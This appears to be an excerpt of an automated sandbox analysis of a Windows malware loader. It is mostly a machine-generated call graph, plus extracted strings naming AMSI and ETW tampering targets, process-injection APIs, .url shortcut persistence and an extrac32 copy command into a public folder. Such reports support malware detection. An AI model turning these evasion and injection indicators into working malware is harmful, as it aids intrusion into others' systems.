2d840ee 37153->37157 37158 2d647b0 11 API calls 37154->37158 37159 2d647b0 11 API calls 37155->37159 37160 2d647b0 11 API calls 37156->37160 37161 2d647b0 11 API calls 37157->37161 37162 2d86bac 37158->37162 37163 2d863ed 37159->37163 37165 2d858d2 37160->37165 37164 2d84125 37161->37164 37166 2d77be8 17 API calls 37162->37166 37167 2d77be8 17 API calls 37163->37167 37168 2d77be8 17 API calls 37164->37168 37171 2d77be8 17 API calls 37165->37171 37169 2d86bd0 37166->37169 37170 2d86411 37167->37170 37172 2d84149 37168->37172 37173 2d64824 11 API calls 37169->37173 37174 2d64824 11 API calls 37170->37174 37175 2d858f6 37171->37175 37177 2d64824 11 API calls 37172->37177 37178 2d86bf1 37173->37178 37179 2d86432 37174->37179 37176 2d64824 11 API calls 37175->37176 37180 2d85917 37176->37180 37181 2d8416a 37177->37181 37182 2d647b0 11 API calls 37178->37182 37183 2d647b0 11 API calls 37179->37183 37184 2d647b0 11 API calls 37180->37184 37185 2d647b0 11 API calls 37181->37185 37186 2d86c28 37182->37186 37187 2d86469 37183->37187 37189 2d8594e 37184->37189 37188 2d841a1 37185->37188 37190 2d77be8 17 API calls 37186->37190 37191 2d77be8 17 API calls 37187->37191 37192 2d77be8 17 API calls 37188->37192 37195 2d77be8 17 API calls 37189->37195 37193 2d86c4c 37190->37193 37194 2d8648d 37191->37194 37196 2d841c5 37192->37196 37197 2d64824 11 API calls 37193->37197 37198 2d64824 11 API calls 37194->37198 37200 2d85972 37195->37200 37199 2d64824 11 API calls 37196->37199 37201 2d86c6d 37197->37201 37202 2d864ae 37198->37202 37204 2d841e6 37199->37204 38401 2d79e70 29 API calls 37200->38401 37206 2d647b0 11 API calls 37201->37206 37207 2d647b0 11 API calls 37202->37207 37209 2d647b0 11 API calls 37204->37209 37205 2d85999 37208 2d64824 11 API calls 37205->37208 37210 2d86ca4 37206->37210 37211 2d864e5 37207->37211 37212 2d859ba 37208->37212 37213 2d8421d 37209->37213 37214 2d77be8 17 API calls 37210->37214 37215 2d77be8 17 API calls 37211->37215 37218 2d647b0 11 API calls 37212->37218 37216 2d77be8 17 API calls 37213->37216 37228 2d86cc8 37214->37228 37217 2d86509 37215->37217 37219 2d84241 37216->37219 37220 2d64824 11 API calls 37217->37220 37224 2d859f1 37218->37224 37221 2d64824 11 API calls 37219->37221 37225 2d8652a 37220->37225 37227 2d84262 37221->37227 37222 2d874a8 37223 2d64824 11 API calls 37222->37223 37234 2d874c9 37223->37234 37226 2d77be8 17 API calls 37224->37226 37231 2d647b0 11 API calls 37225->37231 37229 2d85a15 37226->37229 37233 2d647b0 11 API calls 37227->37233 37228->37222 37230 2d64824 11 API calls 37228->37230 37232 2d64824 11 API calls 37229->37232 37236 2d86d13 37230->37236 37237 2d86561 37231->37237 37238 2d85a36 37232->37238 37239 2d84299 37233->37239 37235 2d647b0 11 API calls 37234->37235 37243 2d87500 37235->37243 37240 2d647b0 11 API calls 37236->37240 37241 2d77be8 17 API calls 37237->37241 37244 2d647b0 11 API calls 37238->37244 37245 2d77be8 17 API calls 37239->37245 37250 2d86d4a 37240->37250 37242 2d86585 37241->37242 37246 2d64824 11 API calls 37242->37246 37249 2d77be8 17 API calls 37243->37249 37253 2d85a6d 37244->37253 37247 2d842bd 37245->37247 37255 2d865a6 37246->37255 37248 2d64824 11 API calls 37247->37248 37256 2d842de 37248->37256 37251 2d87524 37249->37251 37254 2d77be8 17 API calls 37250->37254 37252 2d64824 11 API calls 37251->37252 37264 2d87545 37252->37264 37258 2d77be8 17 API calls 37253->37258 37257 2d86d6e 37254->37257 37260 2d647b0 11 API calls 37255->37260 37263 2d647b0 11 API calls 37256->37263 37259 2d64824 11 API calls 37257->37259 37261 2d85a91 37258->37261 37266 2d86d8f 37259->37266 37267 2d865dd 37260->37267 37262 2d64824 11 API calls 37261->37262 37268 2d85ab2 37262->37268 37269 2d84315 37263->37269 37265 2d647b0 11 API calls 37264->37265 37273 2d8757c 37265->37273 37270 2d647b0 11 API calls 37266->37270 37271 2d77be8 17 API calls 37267->37271 37274 2d647b0 11 API calls 37268->37274 37275 2d77be8 17 API calls 37269->37275 37280 2d86dc6 37270->37280 37272 2d86601 37271->37272 37276 2d64824 11 API calls 37272->37276 37278 2d77be8 17 API calls 37273->37278 37284 2d85ae9 37274->37284 37277 2d84339 37275->37277 37287 2d86622 37276->37287 37279 2d64824 11 API calls 37277->37279 37281 2d875a0 37278->37281 37282 2d84361 37279->37282 37286 2d77be8 17 API calls 37280->37286 37283 2d64824 11 API calls 37281->37283 37285 2d8436c WinExec 37282->37285 37294 2d875c1 37283->37294 37290 2d77be8 17 API calls 37284->37290 37288 2d64824 11 API calls 37285->37288 37289 2d86dea 37286->37289 37292 2d647b0 11 API calls 37287->37292 37296 2d84393 37288->37296 37291 2d64824 11 API calls 37289->37291 37293 2d85b0d 37290->37293 37298 2d86e0b 37291->37298 37299 2d86659 37292->37299 37295 2d64824 11 API calls 37293->37295 37297 2d647b0 11 API calls 37294->37297 37305 2d85b4d 37295->37305 37300 2d647b0 11 API calls 37296->37300 37304 2d875f8 37297->37304 37301 2d647b0 11 API calls 37298->37301 37302 2d77be8 17 API calls 37299->37302 37310 2d843ca 37300->37310 37311 2d86e42 37301->37311 37303 2d8667d 37302->37303 37306 2d62ee0 2 API calls 37303->37306 37308 2d77be8 17 API calls 37304->37308 37309 2d647b0 11 API calls 37305->37309 37307 2d86682 37306->37307 37314 2d64824 11 API calls 37307->37314 37318 2d8761c 37308->37318 37319 2d85b84 37309->37319 37312 2d77be8 17 API calls 37310->37312 37313 2d77be8 17 API calls 37311->37313 37315 2d843ee 37312->37315 37317 2d86e66 37313->37317 37325 2d866bb 37314->37325 37316 2d64824 11 API calls 37315->37316 37327 2d8440f 37316->37327 37320 2d7d198 11 API calls 37317->37320 37322 2d77be8 17 API calls 37318->37322 37323 2d77be8 17 API calls 37319->37323 37321 2d86e81 37320->37321 37324 2d64824 11 API calls 37321->37324 37331 2d8764f 37322->37331 37326 2d85ba8 37323->37326 37332 2d86eaa 37324->37332 37329 2d647b0 11 API calls 37325->37329 37328 2d64824 11 API calls 37326->37328 37330 2d647b0 11 API calls 37327->37330 37333 2d85bc9 37328->37333 37336 2d866f2 37329->37336 37338 2d84446 37330->37338 37334 2d77be8 17 API calls 37331->37334 37335 2d64824 11 API calls 37332->37335 37337 2d647b0 11 API calls 37333->37337 37341 2d87682 37334->37341 37343 2d86ee2 37335->37343 37339 2d77be8 17 API calls 37336->37339 37347 2d85c00 37337->37347 37342 2d77be8 17 API calls 37338->37342 37340 2d86716 37339->37340 37344 2d64824 11 API calls 37340->37344 37346 2d77be8 17 API calls 37341->37346 37345 2d8446a 37342->37345 37349 2d647b0 11 API calls 37343->37349 37351 2d86737 37344->37351 37348 2d64824 11 API calls 37345->37348 37354 2d876b5 37346->37354 37350 2d77be8 17 API calls 37347->37350 37353 2d8448b 37348->37353 37356 2d86f19 37349->37356 37352 2d85c24 37350->37352 37357 2d647b0 11 API calls 37351->37357 37355 2d64824 11 API calls 37352->37355 37358 2d647b0 11 API calls 37353->37358 37359 2d77be8 17 API calls 37354->37359 37362 2d85c45 37355->37362 37360 2d77be8 17 API calls 37356->37360 37366 2d8676e 37357->37366 37368 2d844c2 37358->37368 37361 2d876e8 37359->37361 37363 2d86f3d 37360->37363 37364 2d64824 11 API calls 37361->37364 37367 2d647b0 11 API calls 37362->37367 37365 2d64824 11 API calls 37363->37365 37371 2d87709 37364->37371 37373 2d86f5e 37365->37373 37369 2d77be8 17 API calls 37366->37369 37377 2d85c7c 37367->37377 37372 2d77be8 17 API calls 37368->37372 37370 2d86792 37369->37370 37374 2d64824 11 API calls 37370->37374 37376 2d647b0 11 API calls 37371->37376 37375 2d844e6 37372->37375 37379 2d647b0 11 API calls 37373->37379 37381 2d867b3 37374->37381 37378 2d64824 11 API calls 37375->37378 37384 2d87740 37376->37384 37380 2d77be8 17 API calls 37377->37380 37383 2d84507 37378->37383 37386 2d86f95 37379->37386 37382 2d85ca0 37380->37382 37387 2d647b0 11 API calls 37381->37387 38402 2d75aa8 42 API calls 37382->38402 37389 2d647b0 11 API calls 37383->37389 37390 2d77be8 17 API calls 37384->37390 37392 2d77be8 17 API calls 37386->37392 37398 2d867ea 37387->37398 37400 2d8453e 37389->37400 37393 2d87764 37390->37393 37391 2d85ccc 37396 2d64b90 11 API calls 37391->37396 37394 2d86fb9 37392->37394 37395 2d64824 11 API calls 37393->37395 37397 2d67e18 GetFileAttributesA 37394->37397 37409 2d87785 37395->37409 37399 2d85ce1 37396->37399 37401 2d86fc3 37397->37401 37404 2d77be8 17 API calls 37398->37404 37402 2d64824 11 API calls 37399->37402 37405 2d77be8 17 API calls 37400->37405 37403 2d872a2 37401->37403 37406 2d64824 11 API calls 37401->37406 37414 2d85d02 37402->37414 37408 2d64824 11 API calls 37403->37408 37407 2d8680e GetCurrentProcess 37404->37407 37418 2d84562 37405->37418 37415 2d86fec 37406->37415 38410 2d77968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 37407->38410 37416 2d872c3 37408->37416 37412 2d647b0 11 API calls 37409->37412 37411 2d86828 37413 2d64824 11 API calls 37411->37413 37424 2d877bc 37412->37424 37425 2d8684e 37413->37425 37420 2d647b0 11 API calls 37414->37420 37422 2d647b0 11 API calls 37415->37422 37423 2d647b0 11 API calls 37416->37423 37417 2d847d5 37419 2d64824 11 API calls 37417->37419 37418->37417 37421 2d64824 11 API calls 37418->37421 37428 2d847f6 37419->37428 37431 2d85d39 37420->37431 37427 2d84598 37421->37427 37432 2d87023 37422->37432 37433 2d872fa 37423->37433 37426 2d77be8 17 API calls 37424->37426 37429 2d647b0 11 API calls 37425->37429 37430 2d877e0 37426->37430 37435 2d647b0 11 API calls 37427->37435 37436 2d647b0 11 API calls 37428->37436 37442 2d86885 37429->37442 37434 2d64824 11 API calls 37430->37434 37437 2d77be8 17 API calls 37431->37437 37438 2d77be8 17 API calls 37432->37438 37439 2d77be8 17 API calls 37433->37439 37446 2d87801 37434->37446 37448 2d845cf 37435->37448 37449 2d8482d 37436->37449 37440 2d85d5d 37437->37440 37441 2d87047 37438->37441 37443 2d8731e 37439->37443 38403 2d649bc 37440->38403 37444 2d64824 11 API calls 37441->37444 37450 2d77be8 17 API calls 37442->37450 37445 2d64824 11 API calls 37443->37445 37461 2d87068 37444->37461 37458 2d8733f 37445->37458 37453 2d647b0 11 API calls 37446->37453 37455 2d77be8 17 API calls 37448->37455 37456 2d77be8 17 API calls 37449->37456 37452 2d868a9 37450->37452 37457 2d64824 11 API calls 37452->37457 37466 2d87838 37453->37466 37459 2d845f3 37455->37459 37460 2d84851 37456->37460 37467 2d868ca 37457->37467 37465 2d647b0 11 API calls 37458->37465 37462 2d64824 11 API calls 37459->37462 37463 2d64824 11 API calls 37460->37463 37464 2d647b0 11 API calls 37461->37464 37474 2d8709f 37464->37474 37469 2d77be8 17 API calls 37466->37469 37480 2d8785c 37469->37480 37478 2d77be8 17 API calls 37474->37478 37487 2d77be8 17 API calls 37480->37487 37908 2d62eed 37907->37908 37909 2d62ef8 GetTickCount 37907->37909 37908->35391 37909->35391 37911 2d64964 37910->37911 37912 2d67e22 GetFileAttributesA 37911->37912 37913 2d67e2d 37912->37913 37913->35600 37913->35601 38428 2d64590 37914->38428 37918 2d649f6 37917->37918 37920 2d649c9 37917->37920 37919 2d644a0 11 API calls 37918->37919 37923 2d649ec 37919->37923 37920->37918 37921 2d649dd 37920->37921 37922 2d64590 11 API calls 37921->37922 37922->37923 37923->35669 37925 2d64daa 37924->37925 37925->37925 37927 2d67a98 37926->37927 37928 2d67ab9 37927->37928 38433 2d6761c 42 API calls 37927->38433 37930 2d7d270 37928->37930 37931 2d7d28d 37930->37931 37932 2d7d2eb 37931->37932 38434 2d64688 11 API calls 37931->38434 38435 2d644f4 11 API calls 37931->38435 37934 2d644a0 11 API calls 37932->37934 37935 2d7d300 37934->37935 37937 2d644a0 11 API calls 37935->37937 37938 2d7d308 37937->37938 37938->36242 37940 2d644f4 11 API calls 37939->37940 37943 2d7d220 37940->37943 37941 2d7d267 37941->36325 37942 2d649bc 11 API calls 37942->37943 37943->37941 37943->37942 37945 2d7c659 37944->37945 37946 2d644f4 11 API calls 37945->37946 37947 2d7c685 37946->37947 38436 2d65794 37947->38436 37949 2d7c6a9 37950 2d7c6c5 37949->37950 37952 2d649c4 11 API calls 37949->37952 37953 2d7c6d7 37949->37953 38439 2d64a04 11 API calls 37949->38439 37951 2d644f4 11 API calls 37950->37951 37951->37953 37952->37949 37955 2d644c4 11 API calls 37953->37955 37956 2d7c73c 37955->37956 37957 2d657dc 37956->37957 37958 2d657e3 37957->37958 37959 2d657fd 37958->37959 38462 2d657a0 13 API calls 37958->38462 37959->36449 37962 2d64964 37961->37962 37963 2d67e46 GetFileAttributesA 37962->37963 37964 2d67e51 37963->37964 37964->36562 37964->36563 38463 2d75ba4 37965->38463 37967 2d74daa 38467 2d67d9c WriteFile 37967->38467 37968 2d74dc5 37968->36904 37972 2d7c7ae 37970->37972 37971 2d7c850 37973 2d64b90 11 API calls 37971->37973 37972->37971 38500 2d64688 11 API calls 37972->38500 38501 2d644f4 11 API calls 37972->38501 37974 2d7c865 37973->37974 37975 2d644f4 11 API calls 37974->37975 37977 2d7c870 37975->37977 37979 2d644a0 11 API calls 37977->37979 37980 2d7c885 37979->37980 37981 2d644c4 11 API calls 37980->37981 37982 2d7c892 37981->37982 37982->36832 37988 2d7d1bd 37983->37988 37984 2d7d1e9 37985 2d644a0 11 API calls 37984->37985 37987 2d7d1fe 37985->37987 37987->36962 37988->37984 38502 2d64688 11 API calls 37988->38502 38503 2d644f4 11 API calls 37988->38503 38375 2d64ee4 2 API calls 38374->38375 38376 2d7c4f1 38375->38376 38377 2d644a0 11 API calls 38376->38377 38378 2d7c506 38377->38378 38379 2d7c516 RtlDosPathNameToNtPathName_U 38378->38379 38523 2d7c340 38379->38523 38381 2d7c532 NtOpenFile NtQueryInformationFile 38382 2d64b90 11 API calls 38381->38382 38383 2d7c56d 38382->38383 38384 2d649bc 11 API calls 38383->38384 38385 2d7c579 NtReadFile NtClose 38384->38385 38386 2d7c5a3 38385->38386 38387 2d64c24 SysFreeString 38386->38387 38388 2d7c5ab 38387->38388 38388->35827 38390 2d7c5da 38389->38390 38524 2d68d50 38390->38524 38393 2d644a0 11 API calls 38394 2d7c62d 38393->38394 38394->35950 38394->35951 38396 2d64d3e 38395->38396 38397->36563 38398->36864 38401->37205 38402->37391 38405 2d64970 38403->38405 38404 2d649ab RtlMoveMemory 38405->38404 38406 2d64564 11 API calls 38405->38406 38410->37411 38417 2d64c2a SysFreeString 38416->38417 38418 2d64c38 38416->38418 38417->38418 38418->36113 38420 2d64c42 38419->38420 38421 2d64c48 SysFreeString 38420->38421 38422 2d64c5a 38420->38422 38421->38420 38422->36216 38423->36334 38424->36346 38425->36368 38426->36393 38427->36422 38429 2d64564 11 API calls 38428->38429 38430 2d645a0 38429->38430 38431 2d644a0 11 API calls 38430->38431 38432 2d645b8 38431->38432 38432->35664 38433->37928 38434->37931 38435->37931 38440 2d65608 38436->38440 38439->37949 38441 2d65627 38440->38441 38445 2d65641 38440->38445 38442 2d65632 38441->38442 38457 2d62cf4 11 API calls 38441->38457 38458 2d65600 13 API calls 38442->38458 38446 2d6568a 38445->38446 38459 2d62cf4 11 API calls 38445->38459 38448 2d65697 38446->38448 38449 2d656cc 38446->38449 38460 2d62c44 11 API calls 38448->38460 38451 2d62c10 11 API calls 38449->38451 38452 2d656d6 38451->38452 38453 2d656c7 38452->38453 38461 2d655e8 16 API calls 38452->38461 38454 2d6563c 38453->38454 38456 2d65608 16 API calls 38453->38456 38454->37949 38456->38453 38457->38442 38458->38454 38459->38446 38460->38453 38461->38453 38462->37959 38464 2d75bad 38463->38464 38469 2d75be8 38464->38469 38466 2d75bc9 38466->37967 38468 2d67db9 38467->38468 38468->37968 38470 2d75c03 38469->38470 38471 2d75c2a 38470->38471 38472 2d75ca8 38470->38472 38474 2d75c43 CreateFileA 38471->38474 38496 2d67d18 CreateFileA 38472->38496 38476 2d75c54 38474->38476 38475 2d75cb2 38491 2d75ca1 38475->38491 38497 2d67f54 12 API calls 38475->38497 38476->38491 38493 2d67f54 12 API calls 38476->38493 38477 2d644f4 11 API calls 38480 2d75d15 38477->38480 38485 2d644c4 11 API calls 38480->38485 38481 2d75ccd GetLastError 38498 2d6a734 12 API calls 38481->38498 38482 2d75c68 GetLastError 38494 2d6a734 12 API calls 38482->38494 38488 2d75d2f 38485->38488 38486 2d75ce4 38499 2d6b040 42 API calls 38486->38499 38487 2d75c7f 38495 2d6b040 42 API calls 38487->38495 38488->38466 38491->38477 38492 2d75d06 38492->38491 38493->38482 38494->38487 38495->38491 38496->38475 38497->38481 38498->38486 38499->38492 38500->37972 38501->37972 38502->37988 38503->37988 38523->38381 38525 2d68d5d 38524->38525 38526 2d68d83 38525->38526 38528 2d6761c 42 API calls 38525->38528 38526->38393 38528->38526 38529 2d61c6c 38530 2d61d04 38529->38530 38531 2d61c7c 38529->38531 38534 2d61d0d 38530->38534 38537 2d61f58 38530->38537 38532 2d61cc0 38531->38532 38533 2d61c89 38531->38533 38535 2d61724 10 API calls 38532->38535 38536 2d61c94 38533->38536 38577 2d61724 38533->38577 38539 2d61d25 38534->38539 38553 2d61e24 38534->38553 38560 2d61cd7 38535->38560 38538 2d61fec 38537->38538 38541 2d61fac 38537->38541 38542 2d61f68 38537->38542 38544 2d61d2c 38539->38544 38545 2d61d48 38539->38545 38550 2d61dfc 38539->38550 38547 2d61fb2 38541->38547 38551 2d61724 10 API calls 38541->38551 38548 2d61724 10 API calls 38542->38548 38543 2d61e7c 38549 2d61724 10 API calls 38543->38549 38562 2d61e95 38543->38562 38554 2d61d79 Sleep 38545->38554 38569 2d61d9c 38545->38569 38546 2d61cfd 38567 2d61f82 38548->38567 38564 2d61f2c 38549->38564 38555 2d61724 10 API calls 38550->38555 38568 2d61fc1 38551->38568 38552 2d61cb9 38553->38543 38557 2d61e55 Sleep 38553->38557 38553->38562 38558 2d61d91 Sleep 38554->38558 38554->38569 38572 2d61e05 38555->38572 38556 2d61fa7 38557->38543 38561 2d61e6f Sleep 38557->38561 38558->38545 38559 2d61ca1 38559->38552 38601 2d61a8c 38559->38601 38560->38546 38566 2d61a8c 8 API calls 38560->38566 38561->38553 38564->38562 38571 2d61a8c 8 API calls 38564->38571 38565 2d61e1d 38566->38546 38567->38556 38570 2d61a8c 8 API calls 38567->38570 38568->38556 38573 2d61a8c 8 API calls 38568->38573 38570->38556 38574 2d61f50 38571->38574 38572->38565 38575 2d61a8c 8 API calls 38572->38575 38576 2d61fe4 38573->38576 38575->38565 38578 2d6173c 38577->38578 38579 2d61968 38577->38579 38590 2d617cb Sleep 38578->38590 38592 2d6174e 38578->38592 38580 2d61938 38579->38580 38581 2d61a80 38579->38581 38585 2d61947 Sleep 38580->38585 38594 2d61986 38580->38594 38582 2d61684 VirtualAlloc 38581->38582 38583 2d61a89 38581->38583 38586 2d616bf 38582->38586 38587 2d616af 38582->38587 38583->38559 38584 2d6175d 38584->38559 38588 2d6195d Sleep 38585->38588 38585->38594 38586->38559 38618 2d61644 38587->38618 38588->38580 38590->38592 38593 2d617e4 Sleep 38590->38593 38591 2d6182c 38600 2d61838 38591->38600 38624 2d615cc 38591->38624 38592->38584 38592->38591 38595 2d6180a Sleep 38592->38595 38593->38578 38596 2d615cc VirtualAlloc 38594->38596 38598 2d619a4 38594->38598 38595->38591 38597 2d61820 Sleep 38595->38597 38596->38598 38597->38592 38598->38559 38600->38559 38602 2d61aa1 38601->38602 38603 2d61b6c 38601->38603 38605 2d61aa7 38602->38605 38608 2d61b13 Sleep 38602->38608 38604 2d616e8 38603->38604 38603->38605 38607 2d61c66 38604->38607 38609 2d61644 2 API calls 38604->38609 38606 2d61ab0 38605->38606 38611 2d61b4b Sleep 38605->38611 38614 2d61b81 38605->38614 38606->38552 38607->38552 38608->38605 38610 2d61b2d Sleep 38608->38610 38612 2d616f5 VirtualFree 38609->38612 38610->38602 38613 2d61b61 Sleep 38611->38613 38611->38614 38615 2d6170d 38612->38615 38613->38605 38616 2d61c00 VirtualFree 38614->38616 38617 2d61ba4 38614->38617 38615->38552 38616->38552 38617->38552 38619 2d61681 38618->38619 38620 2d6164d 38618->38620 38619->38586 38620->38619 38621 2d6164f Sleep 38620->38621 38622 2d61664 38621->38622 38622->38619 38623 2d61668 Sleep 38622->38623 38623->38620 38628 2d61560 38624->38628 38626 2d615d4 VirtualAlloc 38627 2d615eb 38626->38627 38627->38600 38629 2d61500 38628->38629 38629->38626 38630 2d8a2f4 38640 2d66530 38630->38640 38634 2d8a322 38645 2d89b3c timeSetEvent 38634->38645 38636 2d8a32c 38637 2d8a33a GetMessageA 38636->38637 38638 2d8a32e TranslateMessage DispatchMessageA 38637->38638 38639 2d8a34a 38637->38639 38638->38637 38641 2d6653b 38640->38641 38646 2d6415c 38641->38646 38644 2d64270 SysAllocStringLen SysFreeString SysReAllocStringLen 38644->38634 38645->38636 38647 2d641a2 38646->38647 38648 2d643ac 38647->38648 38649 2d6421b 38647->38649 38652 2d643dd 38648->38652 38655 2d643ee 38648->38655 38660 2d640f4 38649->38660 38665 2d64320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38652->38665 38654 2d643e7 38654->38655 38656 2d64433 FreeLibrary 38655->38656 38657 2d64457 38655->38657 38656->38655 38658 2d64466 ExitProcess 38657->38658 38659 2d64460 38657->38659 38659->38658 38661 2d64137 38660->38661 38662 2d64104 38660->38662 38661->38644 38662->38661 38663 2d615cc VirtualAlloc 38662->38663 38666 2d6582c 38662->38666 38663->38662 38665->38654 38667 2d65858 38666->38667 38668 2d6583c GetModuleFileNameA 38666->38668 38667->38662 38670 2d65a90 GetModuleFileNameA RegOpenKeyExA 38668->38670 38671 2d65b13 38670->38671 38672 2d65ad3 RegOpenKeyExA 38670->38672 38688 2d658cc 12 API calls 38671->38688 38672->38671 38673 2d65af1 RegOpenKeyExA 38672->38673 38673->38671 38675 2d65b9c lstrcpynA GetThreadLocale GetLocaleInfoA 38673->38675 38677 2d65cb6 38675->38677 38678 2d65bd3 38675->38678 38676 2d65b38 RegQueryValueExA 38679 2d65b76 RegCloseKey 38676->38679 38680 2d65b58 RegQueryValueExA 38676->38680 38677->38667 38678->38677 38681 2d65be3 lstrlenA 38678->38681 38679->38667 38680->38679 38683 2d65bfb 38681->38683 38683->38677 38684 2d65c20 lstrcpynA LoadLibraryExA 38683->38684 38685 2d65c48 38683->38685 38684->38685 38685->38677 38686 2d65c52 lstrcpynA LoadLibraryExA 38685->38686 38686->38677 38687 2d65c84 lstrcpynA LoadLibraryExA 38686->38687 38687->38677 38688->38676

                                                                                        Executed Functions

                                                                                        Function 02D7D5D0 Relevance: 220.4, APIs: 9, Strings: 112, Instructions: 8669COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InetIsOffline.URL(00000000,00000000,02D88FB6,?,?,?,00000000,00000000), ref: 02D7D604
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                          • Part of subcall function 02D6C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DC55F0,?,02D7E40F,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession), ref: 02D6C337
                                                                                          • Part of subcall function 02D7C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C517
                                                                                          • Part of subcall function 02D7C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C547
                                                                                          • Part of subcall function 02D7C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D7C55C
                                                                                          • Part of subcall function 02D7C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D7C588
                                                                                          • Part of subcall function 02D7C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D7C591
                                                                                          • Part of subcall function 02D67E3C: GetFileAttributesA.KERNEL32(00000000,?,02D81133,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,ScanString), ref: 02D67E47
                                                                                          • Part of subcall function 02D68004: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D81324,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,Initialize,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC), ref: 02D68011
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                        • String ID: .url$<i$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                        • API String ID: 2725267379-2437051637
                                                                                        • Opcode ID: 75e1aeec5ef8a0f89cb0c9aae3923b90aefe5fd7ba342f3895860fde09ab0e37
                                                                                        • Instruction ID: 25282cf63fff58e35b71d85727c2540ecfe5b3e3bd65487b47f4eae89523e043
                                                                                        • Opcode Fuzzy Hash: 75e1aeec5ef8a0f89cb0c9aae3923b90aefe5fd7ba342f3895860fde09ab0e37
                                                                                        • Instruction Fuzzy Hash: 3904DF34A502598FDB20FBA4DC94EEEB3B7EB85300F5085A5E009E7354DA70AE95CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D85FA0 Relevance: 142.4, APIs: 3, Strings: 77, Instructions: 2445COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
